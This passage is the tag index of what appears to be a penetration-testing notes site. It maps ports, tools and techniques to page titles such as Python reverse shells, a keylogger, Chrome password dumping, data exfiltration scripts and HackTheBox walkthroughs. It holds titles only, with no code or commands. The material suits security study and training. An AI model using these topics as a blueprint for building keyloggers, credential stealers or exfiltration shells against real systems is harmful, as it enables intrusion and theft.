                        ","tags":["tags"]},{"location":"tags/#port-143","title":"port 143","text":"
                        • Ports 110,143,993, 995 IMAP POP3
                        ","tags":["tags"]},{"location":"tags/#port-1433","title":"port 1433","text":"
                        • 1433 msSQL
                        ","tags":["tags"]},{"location":"tags/#port-1521","title":"port 1521","text":"
                        • 1521 - Oracle Transparent Network Substrate (TNS)
                        • sqlplus - To connect and manage the Oracle RDBMS
                        ","tags":["tags"]},{"location":"tags/#port-161","title":"port 161","text":"
                        • 161-162 SNMP Simple Network Management Protocol
                        • braa - SNMP scanner
                        • odat - Oracle Database Attacking Tool
                        • onesixtyone - Fast and simple SNMP scanner
                        • snmpwalk - SNMP scanner
                        ","tags":["tags"]},{"location":"tags/#port-162","title":"port 162","text":"
                        • 1521 - Oracle Transparent Network Substrate (TNS)
                        • 161-162 SNMP Simple Network Management Protocol
                        ","tags":["tags"]},{"location":"tags/#port-20","title":"port 20","text":"
                        • 21 ftp
                        ","tags":["tags"]},{"location":"tags/#port-2049","title":"port 2049","text":"
                        • Port 2049 - NFS Network File System
                        ","tags":["tags"]},{"location":"tags/#port-21","title":"port 21","text":"
                        • 21 ftp
                        ","tags":["tags"]},{"location":"tags/#port-22","title":"port 22","text":"
                        • 22 ssh
                        ","tags":["tags"]},{"location":"tags/#port-23","title":"port 23","text":"
                        • 23 telnet
                        ","tags":["tags"]},{"location":"tags/#port-25","title":"port 25","text":"
                        • Ports 25, 565, 587 - Simple Mail Tranfer Protocol (SMTP)
                        ","tags":["tags"]},{"location":"tags/#port-27017","title":"port 27017","text":"
                        • 27017-27018 mongodb
                        • Walkthough - A HackTheBox machine - Mongod
                        ","tags":["tags"]},{"location":"tags/#port-27018","title":"port 27018","text":"
                        • 27017-27018 mongodb
                        ","tags":["tags"]},{"location":"tags/#port-3128","title":"port 3128","text":"
                        • 3128 squid
                        ","tags":["tags"]},{"location":"tags/#port-3306","title":"port 3306","text":"
                        • 3306 mariadb mysql
                        • Sequel - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#port-3389","title":"port 3389","text":"
                        • 3389 RDP
                        ","tags":["tags"]},{"location":"tags/#port-445","title":"port 445","text":"
                        • Ports 137, 138, 139, 445 SMB
                        • Tactics - A HackTheBox machine
                        • rpcclient - A tool for interacting with smb shares
                        • smbclient - A tool for interacting with smb shares
                        ","tags":["tags"]},{"location":"tags/#port-465","title":"port 465","text":"
                        • Ports 25, 565, 587 - Simple Mail Tranfer Protocol (SMTP)
                        ","tags":["tags"]},{"location":"tags/#port-5432","title":"port 5432","text":"
                        • 5432 postgresql
                        ","tags":["tags"]},{"location":"tags/#port-55007","title":"port 55007","text":"
                        • 55006-55007 Dovecot pop3
                        ","tags":["tags"]},{"location":"tags/#port-55008","title":"port 55008","text":"
                        • 55006-55007 Dovecot pop3
                        ","tags":["tags"]},{"location":"tags/#port-587","title":"port 587","text":"
                        • Ports 25, 565, 587 - Simple Mail Tranfer Protocol (SMTP)
                        ","tags":["tags"]},{"location":"tags/#port-5985","title":"port 5985","text":"
                        • Port 5985, 5986 - WinRM - Windows Remote Management
                        ","tags":["tags"]},{"location":"tags/#port-5986","title":"port 5986","text":"
                        • Port 5985, 5986 - WinRM - Windows Remote Management
                        ","tags":["tags"]},{"location":"tags/#port-623","title":"port 623","text":"
                        • 623 - Intelligent Platform Management Interface (IPMI)
                        • IPMItool
                        ","tags":["tags"]},{"location":"tags/#port-6379","title":"port 6379","text":"
                        • 6379 redis
                        ","tags":["tags"]},{"location":"tags/#port-6653","title":"port 6653","text":"
                        • 6653 Openflow
                        ","tags":["tags"]},{"location":"tags/#port-69","title":"port 69","text":"
                        • Walkthrough - Included - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#port-8080","title":"port 8080","text":"
                        • 8080 JBoss AS Instance 6.1.0
                        ","tags":["tags"]},{"location":"tags/#port-873","title":"port 873","text":"
                        • 873 rsync
                        ","tags":["tags"]},{"location":"tags/#port-993","title":"port 993","text":"
                        • Ports 110,143,993, 995 IMAP POP3
                        ","tags":["tags"]},{"location":"tags/#port-995","title":"port 995","text":"
                        • Ports 110,143,993, 995 IMAP POP3
                        ","tags":["tags"]},{"location":"tags/#port-scanner","title":"port scanner","text":"
                        • Coding a reverse shell that scans ports
                        ","tags":["tags"]},{"location":"tags/#ports","title":"ports","text":"
                        • Well-known ports
                        ","tags":["tags"]},{"location":"tags/#post-exploitation","title":"post exploitation","text":"
                        • Empire
                        ","tags":["tags"]},{"location":"tags/#postgresql","title":"postgresql","text":"
                        • 5432 postgresql
                        • Walkthrough - A HackTheBox machine - Funnel
                        ","tags":["tags"]},{"location":"tags/#powershell","title":"powershell","text":"
                        • Azure Powershell
                        ","tags":["tags"]},{"location":"tags/#privilege-escalation","title":"privilege escalation","text":"
                        • Configuration files
                        • Create a Registry
                        • Cron jobs - path, wildcards, file overwrite.
                        • Walkthrough - Included - A HackTheBox machine
                        • Index for Linux Privilege Escalation
                        • Index for Windows Privilege Escalation
                        • Kernel vulnerability exploitation
                        • linPEAS - A tool to scan Linux system
                        • Linux exploit suggester
                        • Linux Privilege Checker
                        • lxd
                        • Pass The Hash
                        • PowerUp.ps1
                        • Process capabilities - getcap
                        • SSH keys
                        • Suid Binaries
                        • Windows binaries - LOLBAS
                        • Recently accessed files and executed commands
                        • winPEAS - Windows Privilege Escalation Awesome Scripts
                        • Privilege escalation - Weak service file permission
                        ","tags":["tags"]},{"location":"tags/#privileges-escalation","title":"privileges escalation","text":"
                        • Dirty COW (Copy On Write)
                        ","tags":["tags"]},{"location":"tags/#procesmonitor","title":"procesMonitor","text":"
                        • Information gathering phase - Thick client Applications
                        ","tags":["tags"]},{"location":"tags/#process-hacker-tool","title":"process hacker tool","text":"
                        • Attacking thick clients applications - Data storage issues
                        ","tags":["tags"]},{"location":"tags/#proxy","title":"proxy","text":"
                        • 3128 squid
                        • Burpsuite
                        • Interactsh - An alternative to BurpSuite Collaborator
                        ","tags":["tags"]},{"location":"tags/#public-cloud","title":"public cloud","text":"
                        • Amazon Web Services (AWS) Essentials
                        • Google Cloud Platform Essentials
                        ","tags":["tags"]},{"location":"tags/#python","title":"python","text":"
                        • django pentesting
                        • Inmunity Debugger
                        • noip
                        • pyftpdlib - A ftp server written in python
                        • pyinstaller
                        • Responder.py - A SMB server to listen to NTLM hashes
                        • Bypassing IPS with handmade XOR Encryption
                        • Bypassing Next Generation Firewalls
                        • Coding a data exfiltration script for a http shell
                        • Coding a low level data exfiltration - TCP connection
                        • Coding a reverse shell that scans ports
                        • Coding a reverse shell that searches files
                        • Coding a TCP connection and d reverse shell
                        • Coding an http reverse shell
                        • Coding a DDNS aware shell
                        • DNS poisoning
                        • Dumping saved passwords from Google Chrome
                        • Hickjack the Internet Explorer process to bypass an host-based firewall
                        • Hijacking Keepass Password Manager
                        • Including cd command into TCP reverse shell
                        • Making a screenshot
                        • Making your binary persistent
                        • Man in the browser attack
                        • pip
                        • Privilege escalation - Weak service file permission
                        • Installing python
                        • Simple keylogger in python
                        • Python tools for pentesting
                        • TCP reverse shell with AES encryption
                        • TCP reverse shell with hybrid encryption AES + RSA
                        • TCP reverse shell with RSA encryption
                        • Tunning the connection attempts
                        ","tags":["tags"]},{"location":"tags/#python-pentesting","title":"python pentesting","text":"
                        • Inmunity Debugger
                        • Bypassing IPS with handmade XOR Encryption
                        • Bypassing Next Generation Firewalls
                        • Coding a data exfiltration script for a http shell
                        • Coding a low level data exfiltration - TCP connection
                        • Coding a reverse shell that scans ports
                        • Coding a reverse shell that searches files
                        • Coding a TCP connection and d reverse shell
                        • Coding an http reverse shell
                        • Coding a DDNS aware shell
                        • DNS poisoning
                        • Dumping saved passwords from Google Chrome
                        • Hickjack the Internet Explorer process to bypass an host-based firewall
                        • Hijacking Keepass Password Manager
                        • Including cd command into TCP reverse shell
                        • Making a screenshot
                        • Making your binary persistent
                        • Man in the browser attack
                        • Privilege escalation - Weak service file permission
                        • Installing python
                        • Simple keylogger in python
                        • Python tools for pentesting
                        • TCP reverse shell with AES encryption
                        • TCP reverse shell with hybrid encryption AES + RSA
                        • TCP reverse shell with RSA encryption
                        • Tunning the connection attempts
                        ","tags":["tags"]},{"location":"tags/#rce","title":"rce","text":"
                        • SirepRAT - RCE as SYSTEM on Windows IoT Core
                        • smbmap
                        ","tags":["tags"]},{"location":"tags/#rdp","title":"rdp","text":"
                        • 3389 RDP
                        • rdesktop
                        • xfreerdp
                        ","tags":["tags"]},{"location":"tags/#reconnaissance","title":"reconnaissance","text":"
                        • The ActiveDirectory PowerShell module
                        • BloodHound
                        • ctr.sh
                        • dnscan - A DNS subdomain scanner
                        • feroxbuster - A web content enumeration tool for not referenced resources
                        • fping - An improved ping tool
                        • Github dorks
                        • Google dorks
                        • grep
                        • HTTrack - A tool for mirrowing sites
                        • masscan - An IP scanner
                        • Nessus
                        • netcraft
                        • netdiscover - A network enumeration tool based on ARP request
                        • nikto
                        • nmap - A network exploration and security auditing tool
                        • OpenVAS
                        • openVAS Reporting
                        • p0f
                        • ping
                        • Powercat - An alternative to netcat coded in PowerShell
                        • SharpView
                        • sublist3r - A subdomain enumerating tool
                        • tcpdump - A command-line packet analyzer
                        • The Harvester - A tool for pasive and active reconnaissance
                        • waybackurls
                        • Test Network Infrastructure Configuration - OWASP Web Security Testing Guide
                        • Test Application Platform Configuration - OWASP Web Security Testing Guide
                        • Test File Extensions Handling for Sensitive Information - OWASP Web Security Testing Guide
                        • Review Old Backup and Unreferenced Files for Sensitive Information - OWASP Web Security Testing Guide
                        • Enumerate Infrastructure and Application Admin Interfaces - OWASP Web Security Testing Guide
                        • Test HTTP Methods - OWASP Web Security Testing Guide
                        • Test HTTP Strict Transport Security - OWASP Web Security Testing Guide
                        • Test RIA Cross Domain Policy - OWASP Web Security Testing Guide
                        • Test File Permission - OWASP Web Security Testing Guide
                        • Test for Subdomain Takeover - OWASP Web Security Testing Guide
                        • Test Cloud Storage - OWASP Web Security Testing Guide
                        • Testing for Content Security Policy - OWASP Web Security Testing Guide
                        • Test Path Confusion - OWASP Web Security Testing Guide
                        • Conduct search engine discovery reconnaissance for information leakage - OWASP Web Security Testing Guide
                        • Fingerprint Web Server - OWASP Web Security Testing Guide
                        • Review Webserver Metafiles for Information Leakage - OWASP Web Security Testing Guide
                        • Enumerate Applications on Webserver - OWASP Web Security Testing Guide
                        • Review Webpage content for Information Leakage - OWASP Web Security Testing Guide
                        • Identify Application Entry Points - OWASP Web Security Testing Guide
                        • Map Execution Paths through applications - OWASP Web Security Testing Guide
                        • Fingerprint Web Application Framework - OWASP Web Security Testing Guide
                        • Fingerprint Web Applications - OWASP Web Security Testing Guide
                        • Map Application architecture - OWASP Web Security Testing Guide
                        ","tags":["tags"]},{"location":"tags/#redis","title":"redis","text":"
                        • 6379 redis
                        • Walkthrough - A HackTheBox machine - Redeemer
                        ","tags":["tags"]},{"location":"tags/#reflexil","title":"reflexil","text":"
                        • Reversing and patching thick clients applications
                        ","tags":["tags"]},{"location":"tags/#registry","title":"registry","text":"
                        • Making your binary persistent
                        ","tags":["tags"]},{"location":"tags/#regshot","title":"regshot","text":"
                        • Attacking thick clients applications - Data storage issues
                        ","tags":["tags"]},{"location":"tags/#relational","title":"relational","text":"
                        • sqlite
                        • Virtual environments
                        ","tags":["tags"]},{"location":"tags/#relational-database","title":"relational database","text":"
                        • MariaDB
                        • MySQL
                        ","tags":["tags"]},{"location":"tags/#reporting","title":"reporting","text":"
                        • openVAS Reporting
                        • xsltproc
                        ","tags":["tags"]},{"location":"tags/#resources","title":"resources","text":"
                        • LOLbins - Living off the land binaries - LOLbas and GTFObins
                        • Repo for legacy Operating system
                        • Index of downloads
                        ","tags":["tags"]},{"location":"tags/#responderpy","title":"responder.py","text":"
                        • Responder - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#reverse-shell","title":"reverse shell","text":"
                        • Bank - A HackTheBox machine
                        • Base - A HackTheBox machine
                        • Nibbles - A HackTheBox machine
                        • Popcorn - A HackTheBox machine
                        • pentesmonkey php reverse shell
                        • Coding a data exfiltration script for a http shell
                        • Coding a low level data exfiltration - TCP connection
                        • Coding a reverse shell that scans ports
                        • Coding a reverse shell that searches files
                        • Coding a TCP connection and d reverse shell
                        • Coding an http reverse shell
                        • Coding a DDNS aware shell
                        • Hickjack the Internet Explorer process to bypass an host-based firewall
                        • Including cd command into TCP reverse shell
                        • Making a screenshot
                        • Making your binary persistent
                        • TCP reverse shell with AES encryption
                        • TCP reverse shell with hybrid encryption AES + RSA
                        • TCP reverse shell with RSA encryption
                        • Tunning the connection attempts
                        ","tags":["tags"]},{"location":"tags/#reverse-shells","title":"reverse-shells","text":"
                        • Reverse Shells
                        • Web Shells
                        ","tags":["tags"]},{"location":"tags/#rpc","title":"rpc","text":"
                        • Port 111, 32731 - rpc
                        • Port 43 - whois
                        ","tags":["tags"]},{"location":"tags/#rsa","title":"rsa","text":"
                        • TCP reverse shell with hybrid encryption AES + RSA
                        • TCP reverse shell with RSA encryption
                        ","tags":["tags"]},{"location":"tags/#rsync","title":"rsync","text":"
                        • 873 rsync
                        ","tags":["tags"]},{"location":"tags/#rules","title":"rules","text":"
                        • Contract - Checklist
                        • Contractors Agreement - Checklist for Physical Assessments
                        ","tags":["tags"]},{"location":"tags/#rules-of-engagement","title":"rules of engagement","text":"
                        • Rules of Engagement - Checklist
                        ","tags":["tags"]},{"location":"tags/#s3","title":"s3","text":"
                        • AWS cli
                        ","tags":["tags"]},{"location":"tags/#samba","title":"samba","text":"
                        • Ports 137, 138, 139, 445 SMB
                        • rpcclient - A tool for interacting with smb shares
                        • smbclient - A tool for interacting with smb shares
                        ","tags":["tags"]},{"location":"tags/#scanner","title":"scanner","text":"
                        • Nessus
                        • OpenVAS
                        • openVAS Reporting
                        ","tags":["tags"]},{"location":"tags/#scanning","title":"scanning","text":"
                        • Port 53 - Domain Name Server (DNS)
                        • ctr.sh
                        • dnscan - A DNS subdomain scanner
                        • fping - An improved ping tool
                        • Github dorks
                        • Google dorks
                        • HTTrack - A tool for mirrowing sites
                        • masscan - An IP scanner
                        • nmap - A network exploration and security auditing tool
                        • p0f
                        • ping
                        • Powercat - An alternative to netcat coded in PowerShell
                        • sublist3r - A subdomain enumerating tool
                        ","tags":["tags"]},{"location":"tags/#screenshot-capturer","title":"screenshot capturer","text":"
                        • Making a screenshot
                        ","tags":["tags"]},{"location":"tags/#scripting","title":"scripting","text":"
                        • Bypassing IPS with handmade XOR Encryption
                        • Bypassing Next Generation Firewalls
                        • Coding a data exfiltration script for a http shell
                        • Coding a low level data exfiltration - TCP connection
                        • Coding a reverse shell that scans ports
                        • Coding a reverse shell that searches files
                        • Coding a TCP connection and d reverse shell
                        • Coding an http reverse shell
                        • Coding a DDNS aware shell
                        • Dumping saved passwords from Google Chrome
                        • Hickjack the Internet Explorer process to bypass an host-based firewall
                        • Hijacking Keepass Password Manager
                        • Including cd command into TCP reverse shell
                        • Making a screenshot
                        • Making your binary persistent
                        • pip
                        • Privilege escalation - Weak service file permission
                        • Installing python
                        • Simple keylogger in python
                        • Python tools for pentesting
                        • TCP reverse shell with AES encryption
                        • TCP reverse shell with hybrid encryption AES + RSA
                        • TCP reverse shell with RSA encryption
                        • Tunning the connection attempts
                        ","tags":["tags"]},{"location":"tags/#serialization-vulnerability","title":"serialization vulnerability","text":"
                        • Log4j
                        ","tags":["tags"]},{"location":"tags/#server","title":"server","text":"
                        • Responder.py - A SMB server to listen to NTLM hashes
                        • smbserver - from impacket
                        • uploadserver
                        • WebDav- WsgiDAV - A generic and extendable WebDAV server
                        ","tags":["tags"]},{"location":"tags/#server-enumeration","title":"server enumeration","text":"
                        • httprint - A web server fingerprinting tool
                        ","tags":["tags"]},{"location":"tags/#servers","title":"servers","text":"
                        • Interactsh - An alternative to BurpSuite Collaborator
                        • Setting up servers
                        ","tags":["tags"]},{"location":"tags/#services","title":"services","text":"
                        • Well-known ports
                        ","tags":["tags"]},{"location":"tags/#sheet","title":"sheet","text":"
                        • Pentesting Powerapp
                        ","tags":["tags"]},{"location":"tags/#shells","title":"shells","text":"
                        • msfvenom
                        • Spawn a shell
                        • Tmux - A terminal multiplexer
                        ","tags":["tags"]},{"location":"tags/#smb","title":"smb","text":"
                        • Ports 137, 138, 139, 445 SMB
                        • Port 2049 - NFS Network File System
                        • Tactics - A HackTheBox machine
                        • ntlmrelayx - a module from Impacket
                        • PsExec - a module from Impacket
                        • rpcclient - A tool for interacting with smb shares
                        • smbclient - A tool for interacting with smb shares
                        • smbmap
                        ","tags":["tags"]},{"location":"tags/#smb-vulnerability","title":"smb vulnerability","text":"
                        • Lame - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#snmp_1","title":"snmp","text":"
                        • braa - SNMP scanner
                        • odat - Oracle Database Attacking Tool
                        • onesixtyone - Fast and simple SNMP scanner
                        • snmpwalk - SNMP scanner
                        ","tags":["tags"]},{"location":"tags/#soap","title":"soap","text":"
                        • Pentesting web services
                        ","tags":["tags"]},{"location":"tags/#sql_1","title":"sql","text":"
                        • Sequel - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#sql-injection","title":"sql injection","text":"
                        • Attacking thick clients applications - Data storage issues
                        ","tags":["tags"]},{"location":"tags/#sqli","title":"sqli","text":"
                        • BurpSuite Labs - SQL injection
                        ","tags":["tags"]},{"location":"tags/#ssrf","title":"ssrf","text":"
                        • Gopherus
                        • BurpSuite Labs - Broken access control vulnerabilities
                        • BurpSuite Labs - Server Side Request Forgery
                        ","tags":["tags"]},{"location":"tags/#ssti","title":"ssti","text":"
                        • BurpSuite Labs - Server Side Template Injection
                        ","tags":["tags"]},{"location":"tags/#strings","title":"strings","text":"
                        • Attacking thick clients applications - Data storage issues
                        ","tags":["tags"]},{"location":"tags/#subdomain","title":"subdomain","text":"
                        • Port 53 - Domain Name Server (DNS)
                        • ctr.sh
                        • dnscan - A DNS subdomain scanner
                        ","tags":["tags"]},{"location":"tags/#subdomains","title":"subdomains","text":"
                        • sublist3r - A subdomain enumerating tool
                        ","tags":["tags"]},{"location":"tags/#suid-binaries","title":"suid binaries","text":"
                        • Bank - A HackTheBox machine
                        • Popcorn - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#suid-binary","title":"suid binary","text":"
                        • Base - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#tcp","title":"tcp","text":"
                        • p0f
                        ","tags":["tags"]},{"location":"tags/#tcp-view","title":"tcp view","text":"
                        • Information gathering phase - Thick client Applications
                        ","tags":["tags"]},{"location":"tags/#techniques","title":"techniques","text":"
                        • Pentesting Tomcat
                        • DNS poisoning
                        • Man in the browser attack
                        ","tags":["tags"]},{"location":"tags/#telnet","title":"telnet","text":"
                        • 23 telnet
                        ","tags":["tags"]},{"location":"tags/#terminal","title":"terminal","text":"
                        • msfvenom
                        • Spawn a shell
                        • Tmux - A terminal multiplexer
                        ","tags":["tags"]},{"location":"tags/#tftp","title":"tftp","text":"
                        • 21 ftp
                        • Walkthrough - Included - A HackTheBox machine
                        ","tags":["tags"]},{"location":"tags/#thick-applications","title":"thick applications","text":"
                        • CFF explorer
                        • CFF explorer
                        • mitm_relay Suite
                        • SysInternals Suite
                        ","tags":["tags"]},{"location":"tags/#thick-client","title":"thick client","text":"
                        • Window Detective - A tool to view windows properties in the system
                        • winspy - A tool to view windows properties in the system
                        ","tags":["tags"]},{"location":"tags/#thick-client-application","title":"thick client application","text":"
                        • Process Hacker tool
                        ","tags":["tags"]},{"location":"tags/#thick-client-applications","title":"thick client applications","text":"
                        • Pentesting Thick client Applications - Introduction
                        • Attacking thick clients applications - Data storage issues
                        • Basic Lab Setup - Thick client Applications
                        • Common vulnerabilities
                        • First challenge - Enabling a button - Thick client Applications
                        • Information gathering phase - Thick client Applications
                        • Reversing and patching thick clients applications
                        • Traffic analysis - Thick client Applications
                        • Thick client Applications Pentesting Checklist
                        • Tools for pentesting thick client applications
                        ","tags":["tags"]},{"location":"tags/#thick-client-applications-pentesting","title":"thick client applications pentesting","text":"
                        • Pentesting Thick client Applications - Introduction
                        • Attacking thick clients applications - Data storage issues
                        • Basic Lab Setup - Thick client Applications
                        • Common vulnerabilities
                        • First challenge - Enabling a button - Thick client Applications
                        • Information gathering phase - Thick client Applications
                        • Reversing and patching thick clients applications
                        • Traffic analysis - Thick client Applications
                        • Thick client Applications Pentesting Checklist
                        • Tools for pentesting thick client applications
                        ","tags":["tags"]},{"location":"tags/#tool","title":"tool","text":"
                        • dirb - A web content enumeration tool
                        • feroxbuster - A web content enumeration tool for not referenced resources
                        • Markdown
                        • postfix - A SMTP server
                        • xsltproc
                        ","tags":["tags"]},{"location":"tags/#tools","title":"toolS","text":"
                        • Network traffic capture tools
                        ","tags":["tags"]},{"location":"tags/#tools_1","title":"tools","text":"
                        • Port 5985, 5986 - WinRM - Windows Remote Management
                        • The ActiveDirectory PowerShell module
                        • Amass
                        • apktool
                        • arjun
                        • arpspoof from dniff
                        • BeEF - The browser exploitation framework project
                        • BloodHound
                        • braa - SNMP scanner
                        • Pentesting browsers
                        • Burpsuite
                        • cewl - A custom dictionary generator
                        • Tools for cloning a site
                        • crunch - A dictionary generator
                        • ctr.sh
                        • CUPP - Common User Password Profiler
                        • curl
                        • darkarmour
                        • Dictionaries or wordlists resources
                        • dig axfr
                        • dnsenum - A tool to enumerate DNS
                        • DNSRecon - DNS Enumeration and Scanning Tool
                        • evil-winrm
                        • fierce - DNS scanner that helps locate non-contiguous IP space and hostnames
                        • figlet
                        • Inmunity Debugger
                        • Interactsh - An alternative to BurpSuite Collaborator
                        • mythic
                        • nishang
                        • nslookup
                        • odat - Oracle Database Attacking Tool
                        • onesixtyone - Fast and simple SNMP scanner
                        • Phpggc - A tool for PHP deserialization
                        • PowerUp.ps1
                        • rdesktop
                        • Responder.py - A SMB server to listen to NTLM hashes
                        • rpcclient - A tool for interacting with smb shares
                        • Remote Server Administration Tools (RSAT)
                        • SharpView
                        • smbclient - A tool for interacting with smb shares
                        • smbmap
                        • snmpwalk - SNMP scanner
                        • sqlplus - To connect and manage the Oracle RDBMS
                        • sshpass - A program to pass passwords in the command line to ssh
                        • The Harvester - A tool for pasive and active reconnaissance
                        • vnstat - Monitoring network impact
                        • waybackurls
                        • xfreerdp
                        • Ysoserial - A tool for Java deserialization
                        • Tools for pentesting thick client applications
                        • Creating malware and custom payloads
                        ","tags":["tags"]},{"location":"tags/#traffic-tool","title":"traffic tool","text":"
                        • CFF explorer
                        ","tags":["tags"]},{"location":"tags/#visual-code-grepper","title":"visual code grepper","text":"
                        • Common vulnerabilities
                        ","tags":["tags"]},{"location":"tags/#vpn","title":"vpn","text":"
                        • VPN notes
                        ","tags":["tags"]},{"location":"tags/#vsftpd","title":"vsFTPd","text":"
                        • 21 ftp
                        ","tags":["tags"]},{"location":"tags/#vulnerability","title":"vulnerability","text":"
                        • dirb - A web content enumeration tool
                        ","tags":["tags"]},{"location":"tags/#vulnerability-assessment","title":"vulnerability assessment","text":"
                        • Nessus
                        • OpenVAS
                        • openVAS Reporting
                        ","tags":["tags"]},{"location":"tags/#walkthrough","title":"walkthrough","text":"
                        • Appointment - A HackTheBox machine
                        • Archetype - A HackTheBox machine
                        • Bank - A HackTheBox machine
                        • Base - A HackTheBox machine
                        • Crocodile - A HackTheBox machine
                        • Explosion - A HackTheBox machine
                        • Walkthrough - Friendzone - A HackTheBox machine
                        • Walkthrough - A HackTheBox machine - Funnel
                        • Ignition - A HackTheBox machine
                        • Walkthrough - Included - A HackTheBox machine
                        • Lame - A HackTheBox machine
                        • Markup - A HackTheBox machine
                        • Walkthrough - Metatwo - A HackTheBox machine
                        • Walkthough - A HackTheBox machine - Mongod
                        • Nibbles - A HackTheBox machine
                        • Nunchucks - A HackTheBox machine
                        • Walkthrough - Omni - A HackTheBox machine
                        • Oppsie - A HackTheBox machine
                        • Pennyworth - A HackTheBox machine
                        • Walkthrough - Photobomb - A HackTheBox machine
                        • Popcorn - A HackTheBox machine
                        • Walkthrough - A HackTheBox machine - Redeemer
                        • Responder - A HackTheBox machine
                        • Sequel - A HackTheBox machine
                        • Walkthrough - Support - A HackTheBox machine
                        • Tactics - A HackTheBox machine
                        • Walkthrough - Trick - A HackTheBox machine
                        • Walkthrough - Unified - A HackTheBox machine
                        • Walkthrough - Usage - A HackTheBox machine
                        • Vaccine - A HackThebBox machine
                        • Walkthrough - GoldenEye 1, a vulnhub machine
                        • Vulnhub Raven 1
                        • Vulnhub Raven 2
                        • Index of walkthroughs
                        ","tags":["tags"]},{"location":"tags/#web","title":"web","text":"
                        • Gopherus
                        • Information gathering
                        • netcraft
                        • Reverse Shells
                        • Weevely - A PHP webshell backdoor generator
                        • OWASP Web Security Testing Guide
                        • Review Webserver Metafiles for Information Leakage - OWASP Web Security Testing Guide
                        • Enumerate Applications on Webserver - OWASP Web Security Testing Guide
                        • Review Webpage content for Information Leakage - OWASP Web Security Testing Guide
                        • Identify Application Entry Points - OWASP Web Security Testing Guide
                        • Map Execution Paths through applications - OWASP Web Security Testing Guide
                        • Fingerprint Web Application Framework - OWASP Web Security Testing Guide
                        • Fingerprint Web Applications - OWASP Web Security Testing Guide
                        • Map Application architecture - OWASP Web Security Testing Guide
                        • Web Exploitation Guide
                        • Arbitrary file upload
                        • CSRF attack - Cross Site Request Forgery
                        • Insecure deserialization
                        • Json Web Token attacks
                        • NoSQL injection
                        ","tags":["tags"]},{"location":"tags/#web-enumeration","title":"web enumeration","text":"
                        • feroxbuster - A web content enumeration tool for not referenced resources
                        ","tags":["tags"]},{"location":"tags/#web-pentesting","title":"web pentesting","text":"
                        • 22 ssh
                        • 3128 squid
                        • Aquatone - Automatize web scanner in large subdomain lists
                        • BeEF - The browser exploitation framework project
                        • Bind Shells
                        • Burpsuite
                        • cewl - A custom dictionary generator
                        • Tools for cloning a site
                        • crunch - A dictionary generator
                        • CUPP - Common User Password Profiler
                        • Dictionaries or wordlists resources
                        • django pentesting
                        • eWPT Preparation
                        • EyeWitness
                        • ffuf - A fast web fuzzer written in Go
                        • Responder - A HackTheBox machine
                        • Interactsh - An alternative to BurpSuite Collaborator
                        • knockpy - A subdomain scanner
                        • Laudanum - Injectable Web Exploit Code
                        • Lazagne
                        • Log4j
                        • moodlescan
                        • nikto
                        • searchsploit
                        • sslyze - A tool for scanning certificates
                        • Pentesting Tomcat
                        • veil - A backdoor generator
                        • Vulnhub Raven 1
                        • Vulnhub Raven 2
                        • w3af
                        • WafW00f - A firewall scanner
                        • wfuzz
                        • whatweb - A web scanner
                        • wpscan - Wordpress Security Scanner
                        • XSSer - An automated web pentesting framework tool to detect and exploit XSS vulnerabilities
                        • Testing GraphQL - OWASP Web Security Testing Guide
                        • Testing for Credentials Transported over an Encrypted Channel - OWASP Web Security Testing Guide
                        • Testing for Default Credentials - OWASP Web Security Testing Guide
                        • Testing for Weak Lock Out Mechanism - OWASP Web Security Testing Guide
                        • Testing for Bypassing Authentication Schema - OWASP Web Security Testing Guide
                        • Testing for Vulnerable Remember Password - OWASP Web Security Testing Guide
                        • Testing for Browser Cache Weaknesses - OWASP Web Security Testing Guide
                        • Testing for Weak Password Policy - OWASP Web Security Testing Guide
                        • Testing for Weak Security Question Answer - OWASP Web Security Testing Guide
                        • Testing for Weak Password Change or Reset Functionalities - OWASP Web Security Testing Guide
                        • Testing for Weaker Authentication in Alternative Channel - OWASP Web Security Testing Guide
                        • Testing Multi-Factor Authentication (MFA) - OWASP Web Security Testing Guide
                        • Testing Directory Traversal File Include - OWASP Web Security Testing Guide
                        • Testing for Bypassing Authorization Schema - OWASP Web Security Testing Guide
                        • Testing for Privilege Escalation - OWASP Web Security Testing Guide
                        • Testing for Insecure Direct Object References - OWASP Web Security Testing Guide
                        • Testing for OAuth Weaknesses - OWASP Web Security Testing Guide
                        • Test Business Logic Data Validation - OWASP Web Security Testing Guide
                        • Test Ability to Forge Requests - OWASP Web Security Testing Guide
                        • Test Integrity Checks - OWASP Web Security Testing Guide
                        • Test for Process Timing - OWASP Web Security Testing Guide
                        • Test Number of Times a Function Can Be Used Limits - OWASP Web Security Testing Guide
                        • Testing for the Circumvention of Work Flows - OWASP Web Security Testing Guide
                        • Test Defenses Against Application Misuse - OWASP Web Security Testing Guide
                        • Test Upload of Unexpected File Types - OWASP Web Security Testing Guide
                        • Test Upload of Malicious Files - OWASP Web Security Testing Guide
                        • Test Payment Functionality - OWASP Web Security Testing Guide
                        • Testing for DOM-Based Cross Site Scripting - OWASP Web Security Testing Guide
                        • Testing for JavaScript Execution - OWASP Web Security Testing Guide
                        • Testing for HTML Injection - OWASP Web Security Testing Guide
                        • Testing for Client-side URL Redirect - OWASP Web Security Testing Guide
                        • Testing for CSS Injection - OWASP Web Security Testing Guide
                        • Testing for Client-side Resource Manipulation - OWASP Web Security Testing Guide
                        • Testing Cross Origin Resource Sharing - OWASP Web Security Testing Guide
                        • Testing for Cross Site Flashing - OWASP Web Security Testing Guide
                        • Testing for Clickjackingx - OWASP Web Security Testing Guide
                        • Testing WebSockets - OWASP Web Security Testing Guide
                        • Testing Web Messaging - OWASP Web Security Testing Guide
                        • Testing Browser Storage - OWASP Web Security Testing Guide
                        • Testing for Cross Site Script Inclusion - OWASP Web Security Testing Guide
                        • Testing for Reverse Tabnabbing - OWASP Web Security Testing Guide
                        • Test Network Infrastructure Configuration - OWASP Web Security Testing Guide
                        • Test Application Platform Configuration - OWASP Web Security Testing Guide
                        • Test File Extensions Handling for Sensitive Information - OWASP Web Security Testing Guide
                        • Review Old Backup and Unreferenced Files for Sensitive Information - OWASP Web Security Testing Guide
                        • Enumerate Infrastructure and Application Admin Interfaces - OWASP Web Security Testing Guide
                        • Test HTTP Methods - OWASP Web Security Testing Guide
